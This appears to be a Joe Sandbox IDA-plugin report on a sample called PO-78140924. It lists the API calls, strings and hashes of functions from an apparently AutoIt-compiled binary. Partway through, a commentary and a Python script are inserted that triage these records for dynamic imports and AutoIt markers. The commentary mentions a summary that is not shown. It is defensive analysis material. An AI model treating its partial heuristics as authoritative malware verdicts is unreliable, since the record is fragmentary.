                                                • API String ID: 43455801-0
                                                • Opcode ID: 06bbf1f82a2303e771c20b151d5aa1d09614c10b3a2e4fecab38857b80496500
                                                • Instruction ID: 68ddb0f915a7e33938941f9f886a556d8035e69e4455ea3cd628a05a46a093a8
                                                • Opcode Fuzzy Hash: 06bbf1f82a2303e771c20b151d5aa1d09614c10b3a2e4fecab38857b80496500
                                                • Instruction Fuzzy Hash: 1011097640410DBFEF119F90DC88EEA7FACFB08364F048022BE189A161C7759D95EBA0
                                                APIs
                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00030313
                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 0003031B
                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00030326
                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00030331
                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00030339
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00030341
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Virtual
                                                • String ID:
                                                • API String ID: 4278518827-0
                                                • Opcode ID: 0dad2e6babf611f86d07ede125af8e7ea89941ced11d57517100bf17d7530e7e
                                                • Instruction ID: f2e52019e6262531d90098d08bdecd7fff68bc71b59485ae70c5de1303e18bcc
                                                • Opcode Fuzzy Hash: 0dad2e6babf611f86d07ede125af8e7ea89941ced11d57517100bf17d7530e7e
                                                • Instruction Fuzzy Hash: E5016CB090175A7DE3008F5A8C85B52FFB8FF19354F00411BA15C87941C7F5A864CBE5
                                                APIs
                                                • _memset.LIBCMT ref: 00072AB8
                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00072AD4
                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00072B1A
                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,000D5890,00000000), ref: 00072B63
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem_memset
                                                • String ID: 0
                                                • API String ID: 1173514356-4108050209
                                                • Opcode ID: 70e5b7ee7c82193e8ac9869cd767ed5b35d3fdc7b15014978723867dedafc5c8
                                                • Instruction ID: 711fa743f611da6bb071b5ee04add14fa10d79cde79298ae8100a8d23fe0339a
                                                • Opcode Fuzzy Hash: 70e5b7ee7c82193e8ac9869cd767ed5b35d3fdc7b15014978723867dedafc5c8
                                                • Instruction Fuzzy Hash: 2241B4706043429FD720DF24C885B6AB7E9BF84320F10866EF5A997292D774E904CB56
                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00047C6F
                                                • _memset.LIBCMT ref: 00047C9A
                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,?,00000000,?,?), ref: 00047CF7
                                                • GetLastError.KERNEL32(?,?,00000000,?,?), ref: 00047D13
                                                • _memset.LIBCMT ref: 00047D29
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Locale_memset$ByteCharErrorLastMultiUpdateUpdate::_Wide
                                                • String ID:
                                                • API String ID: 742067911-0
                                                • Opcode ID: 2af82b7b32d7431273b3043c7a3cd0ffc89dedabf7e8ad7d488e9d53ba12c444
                                                • Instruction ID: 207ce28cec79070fb27f2ab3b4791841da4d1009201af5cd9989ce31588a962c
                                                • Opcode Fuzzy Hash: 2af82b7b32d7431273b3043c7a3cd0ffc89dedabf7e8ad7d488e9d53ba12c444
                                                • Instruction Fuzzy Hash: 9A31D4B16082169FDB329F55D8C5ABE3BA8EF41721F0441BDF81D4B292DB349D00C7A5
                                                APIs
                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0001134D
                                                • SelectObject.GDI32(?,00000000), ref: 0001135C
                                                • BeginPath.GDI32(?), ref: 00011373
                                                • SelectObject.GDI32(?,00000000), ref: 0001139C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ObjectSelect$BeginCreatePath
                                                • String ID:
                                                • API String ID: 3225163088-0
                                                • Opcode ID: a34a7594ef1de615cc0ddf4a8d8443008a7ca1dd7de374e0f4edfd5c49e2389a
                                                • Instruction ID: e932811c7722d6c94f8e6a07f8d1c795ac5349b43f22859c5ac655f179f308d3
                                                • Opcode Fuzzy Hash: a34a7594ef1de615cc0ddf4a8d8443008a7ca1dd7de374e0f4edfd5c49e2389a
                                                • Instruction Fuzzy Hash: 87215170801609EBEB109F15DC047E97BE8FB04312F244227FD20A61A4DB799991EFA0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                • String ID:
                                                • API String ID: 2625713937-0
                                                • Opcode ID: a017a1884bf36da767c4b1d4f9a6bab9645dcaf77c237620d6d67e706b63f5aa
                                                • Instruction ID: ff8ecbcf95606b4620c1a64684ddf14f05ceae81e720492b93d6e47a2770c66f
                                                • Opcode Fuzzy Hash: a017a1884bf36da767c4b1d4f9a6bab9645dcaf77c237620d6d67e706b63f5aa
                                                • Instruction Fuzzy Hash: 3EF01D30001709EBEB155F16EC4C7A83BE8B740326F188226ED69980F1CB3845D5EF60
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 0003521D
                                                  • Part of subcall function 00040270: __87except.LIBCMT ref: 000402AB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ErrorHandling__87except__start
                                                • String ID: pow
                                                • API String ID: 2905807303-2276729525
                                                • Opcode ID: 69671b888bb28a018c6e4383145c05bba1309d8f90a4db59e5a67949ee176631
                                                • Instruction ID: 375321f2a09c1aaa8412cc42d7e8514e7d2262a5aee9df17e2e94766c22929cf
                                                • Opcode Fuzzy Hash: 69671b888bb28a018c6e4383145c05bba1309d8f90a4db59e5a67949ee176631
                                                • Instruction Fuzzy Hash: FA51ACF1A0CA0197DB62BB14CD013BF2BDCDB42312F208D68E595521F6EF388DC49A4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #$+
                                                • API String ID: 0-2552117581
                                                • Opcode ID: f2ee9bad5a3fe95a5a094423e6829a015b40009ad9cca0c3f26cc67b680c14cb
                                                • Instruction ID: 916f7231f6eb1bdc2ee468977118776f0f4a2e99fa29c6676ac3b819b1bbc30a
                                                • Opcode Fuzzy Hash: f2ee9bad5a3fe95a5a094423e6829a015b40009ad9cca0c3f26cc67b680c14cb
                                                • Instruction Fuzzy Hash: 34512F351062469FDF26DF28C894AFABBF9EF19310F184055EC919B2A2D7349D82CB61
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _memset$_memmove
                                                • String ID: ERCP
                                                • API String ID: 2532777613-1384759551
                                                • Opcode ID: fae1523cf32b1f600ff4205d6f4dacc2f0e5312732946234180ecee30b08d74b
                                                • Instruction ID: d724531d88be3fd9139c2b61eb3fcec37b6e31c9aec117846dfd665eea7b4a96
                                                • Opcode Fuzzy Hash: fae1523cf32b1f600ff4205d6f4dacc2f0e5312732946234180ecee30b08d74b
                                                • Instruction Fuzzy Hash: 7F51C171900319DFDB24DF65D885BEAB7F8EF04314F20856EE48ACB241E775AA84CB80
                                                APIs
                                                • __snwprintf.LIBCMT ref: 00083B7C
                                                  • Part of subcall function 00017F41: _memmove.LIBCMT ref: 00017F82
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __snwprintf_memmove
                                                • String ID: , $$AUTOITCALLVARIABLE%d$%
                                                • API String ID: 3506404897-809637302
                                                • Opcode ID: d2d9b743570eaae4d2102feb895e16e8a8ebf32a731921e749531471ea048993
                                                • Instruction ID: 025987c1acc3028baaf95c29d504551b8687d8805a5ec45c9d78513a22d3fb8b
                                                • Opcode Fuzzy Hash: d2d9b743570eaae4d2102feb895e16e8a8ebf32a731921e749531471ea048993
                                                • Instruction Fuzzy Hash: 56214171600219ABCF14EF64CC92EEE77B9BF44700F4444A9F945AB182DB70EE45CBA1
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00088E09), ref: 00089203
                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00089215
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                • API String ID: 2574300362-199464113
                                                • Opcode ID: 8cd185efa4157ba3f48f5170520716aa972047ce2ca4d9284ecba861b13af82f
                                                • Instruction ID: 62e2412c061b9fac4dd156d401ef86f570e44c8bc738cf3c2d95208dd603b43e
                                                • Opcode Fuzzy Hash: 8cd185efa4157ba3f48f5170520716aa972047ce2ca4d9284ecba861b13af82f
                                                • Instruction Fuzzy Hash: A6D01730654727DFEB20AF31DD1862676E5BF05351B15C83F99C6DA5A0EBB4D880CB90
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00014C2E,?,00000000), ref: 00014CA3
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00014CB5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                • API String ID: 2574300362-192647395
                                                • Opcode ID: 17d320f26f3d765ebef0f70a40626718632e94fd07c4138de151a2025094d819
                                                • Instruction ID: 03023721097141a497585ef678d3407e47c771d680f33d972644089cd624950a
                                                • Opcode Fuzzy Hash: 17d320f26f3d765ebef0f70a40626718632e94fd07c4138de151a2025094d819
                                                • Instruction Fuzzy Hash: C0D05B30511723CFDB605F31DD1965676D5FF05791B15C83ED885D6160D774D4C0CA90
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00014D2E,?,00014F4F,?,000D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00014D6F
                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00014D81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-3689287502
                                                • Opcode ID: 1a67254d5a4a23b559f597f4b3a461674e9836b57913cb1f5d1668434b6cbda1
                                                • Instruction ID: 1f280e3a7cdc4d3d9c15d69260c413f065e2a4f94e00319dcaac46813faaa248
                                                • Opcode Fuzzy Hash: 1a67254d5a4a23b559f597f4b3a461674e9836b57913cb1f5d1668434b6cbda1
                                                • Instruction Fuzzy Hash: 46D01730610B13CFEB209F31EC1866A76E8BF15352B11883ED486DA260E7B4D8C0CB91
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00014CE1), ref: 00014DA2
                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00014DB4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-1355242751
                                                • Opcode ID: e656c0e2262be926544967087b3f694539d9cfecf201683f150711640c27255a
                                                • Instruction ID: 7ebb76efc64b3231527206789beff10273bfbd850d042e90d0da8d1a6e810bad
                                                • Opcode Fuzzy Hash: e656c0e2262be926544967087b3f694539d9cfecf201683f150711640c27255a
                                                • Instruction Fuzzy Hash: F2D01230550713CFDB205F31E818A9676D4AF06355B11883ED8C5DA160E774D4C0C651
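The four records above share the API ID AddressLibraryLoadProc: each calls LoadLibraryA on kernel32.dll and then GetProcAddress for one export (GetModuleHandleExW, GetNativeSystemInfo, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection). Resolving these at run time instead of through the import table is the usual way a runtime stays loadable on Windows builds that lack an export, and the >>>AUTOIT NO CMDEXECUTE<<< and $AUTOITCALLVARIABLE%d strings in the same records are interpreter strings consistent with the "compiled AutoIt script" signature in the summary. As an added example (not code from Joe Sandbox or its IDA plugin), the script below parses records in the layout shown on this page and flags the two things an analyst would pivot on: GetProcAddress-resolved export names in functions that also call LoadLibraryA, and AutoIt marker strings in a record's arguments or String ID. The sample input is constructed from three records on this page, trimmed to the fields the parser reads; the record-boundary rule (a section header that does not advance past the previous one opens a new record) and the finding labels are my own.

```python
"""Triage Joe Sandbox IDA-plugin function records in the layout shown on this page.
Added example, not Joe Sandbox code. SAMPLE is constructed from three records on the
page, trimmed to the fields this script reads."""
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00014D2E,?,00014F4F,?,000D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00014D6F
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00014D81
Strings
Memory Dump Source
• Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• Opcode ID: 1a67254d5a4a23b559f597f4b3a461674e9836b57913cb1f5d1668434b6cbda1
APIs
• __snwprintf.LIBCMT ref: 00083B7C
  • Part of subcall function 00017F41: _memmove.LIBCMT ref: 00017F82
Similarity
• API ID: __snwprintf_memmove
• String ID: , $$AUTOITCALLVARIABLE%d$%
• Opcode ID: d2d9b743570eaae4d2102feb895e16e8a8ebf32a731921e749531471ea048993
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00098910
Similarity
• API ID: InvalidateRect
• String ID:
• Opcode ID: aa3aa4f655bc6dfb1341a5fc352acd3fa317257287672f0bc6cc35bc2d15936c
"""

# Section headers in the order they appear inside one record on the page.
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*(?P<rest>.+)$")
# "GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00014D81"
API_RE = re.compile(r"^(?P<name>[\w@?$]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
AUTOIT_MARKERS = (">>>AUTOIT NO CMDEXECUTE<<<", "AUTOITCALLVARIABLE")  # interpreter strings seen on this page


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    subcall_of: str = ""  # caller address when listed as "Part of subcall function"


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # the Similarity key/value pairs


def parse_api(body):
    caller = ""
    if m := SUBCALL_RE.match(body):
        caller, body = m["caller"], m["rest"]
    m = API_RE.match(body)
    if not m:
        raise ValueError(f"unrecognised API line: {body!r}")
    return ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], caller)


def parse_records(text):
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            # A header that does not advance past the previous one opens the next record.
            if cur is None or SECTIONS.index(line) <= SECTIONS.index(section):
                cur = FunctionRecord()
                records.append(cur)
            section = line
        elif line.startswith("•") and cur is not None:
            body = line[1:].strip()
            if section == "APIs":
                cur.apis.append(parse_api(body))
            elif section == "Similarity":
                key, _, value = body.partition(":")
                cur.meta[key.strip()] = value.strip()
    return records


def triage(rec):
    """Findings for one record: run-time import resolution and AutoIt markers."""
    findings = []
    if {"LoadLibraryA", "GetProcAddress"} <= {a.name for a in rec.apis}:
        for a in rec.apis:
            if a.name == "GetProcAddress":  # second argument is the export name
                parts = a.args.split(",")
                findings.append("dynamic-import:" + (parts[1] if len(parts) > 1 else "?"))
    blob = " ".join([rec.meta.get("String ID", ""), *(a.args for a in rec.apis)])
    if any(marker in blob for marker in AUTOIT_MARKERS):
        findings.append("autoit-marker")
    return findings


def flagged(text):
    """Opcode ID (a pivot key across reports) -> findings, flagged records only."""
    return {rec.meta.get("Opcode ID", "?"): hits
            for rec in parse_records(text) if (hits := triage(rec))}
```

Run flagged() over the full record list of a report to get the Opcode IDs worth pivoting on; the Opcode ID is stable across reports of the same build, so a hit on one sample can be searched in others, whereas the Instruction Fuzzy Hash is the looser key for near-identical code.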
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Variant$AllocClearCopyInitString
                                                • String ID:
                                                • API String ID: 2808897238-0
                                                • Opcode ID: cbdf7d25fe730e3b2c0fafaced9d3f2e21c9ec1871dbf6eea761eb0c556a23da
                                                • Instruction ID: 55cc01131009de9fbbe30572061fc9621a0e8dab7dc7f6c85f2f0f7a7fab5dc7
                                                • Opcode Fuzzy Hash: cbdf7d25fe730e3b2c0fafaced9d3f2e21c9ec1871dbf6eea761eb0c556a23da
